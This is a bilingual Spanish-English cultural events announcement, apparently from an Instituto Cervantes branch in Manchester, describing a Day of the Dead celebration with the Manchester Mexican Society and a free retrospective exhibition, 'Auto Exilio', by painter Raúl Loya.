Esta tarde el Instituto Cervantes acogerá una velada muy especial: celebramos la tradición ancestral mexicana del Día de Muertos. Contaremos para ello con la Sociedad de Estudiantes Mexicanos de Mánchester. Ellos se encargarán de montar un altar para venerar a los fallecidos, impartirán una charla para explicar el origen de esta festividad mexicana y proyectarán el cortometraje Calaverita, de los hermanos Raúl y Rafael Cárdenas. Además, serviremos sangría y aperitivos y bailaremos al son de la mejor música latina.

México honra a sus muertos con banquetes, música y alegría, pues entienden que los muertos pueden sentirse ofendidos por el duelo y la tristeza de sus seres queridos.

Por tanto, espere encontrar una fiesta ancestral, llena de vida y misticismo.

Hello everyone,

This evening Instituto Cervantes is holding a very special party: we are celebrating the ancient Mexican tradition, Day of the Dead. To do so, we are counting on the Manchester Mexican Society, who will set an altar to honour the dead, as well as give a talk on the origins of this Mexican holiday and show the short movie Calaverita, by Raul and Rafael Cardenas brothers. Besides, we will offer sangria and snacks and we’ll dance to the rhythm of the best Latin music.

Mexico honours the dead with feasts, music and joy, because they understand that the dead may be offended by their loved ones’ mourning and sadness.

Therefore, expect to join an ancestral party, full of life and mysticism.

Estamos encantados de acoger la exposición de pintura del artista mexicano Raúl Loya. Bajo el título ‘Auto Exilio’, esta interesante muestra retrospectiva puede visitarse de forma gratuita hasta el próximo 15 de diciembre, de lunes a viernes, de 10:00 a 18:00h.

Compuesta por lienzos y series gráficas, su obra rezuma color y significado. «El auto exilio se presentó ante mí como una oportunidad de seguir persiguiendo la esperanza de un futuro y sumarme con mi arte a esas voces que dicen: ¡Ya basta!», reflexiona el artista.

We are very pleased to hold the art exhibition by the Mexican artist Raul Loya. Titled ‘Self Exile’, this interesting retrospective is free visiting until next 15th December, Monday to Friday, from 10am to 6pm.

The collection is composed of paintings and some graphic series, and his works are a burst of colour and significance. «Self exile came to me as a chance to keep seeking the hope of a future and join through my art work all those voices that claim: Enough!», reflects the artist.
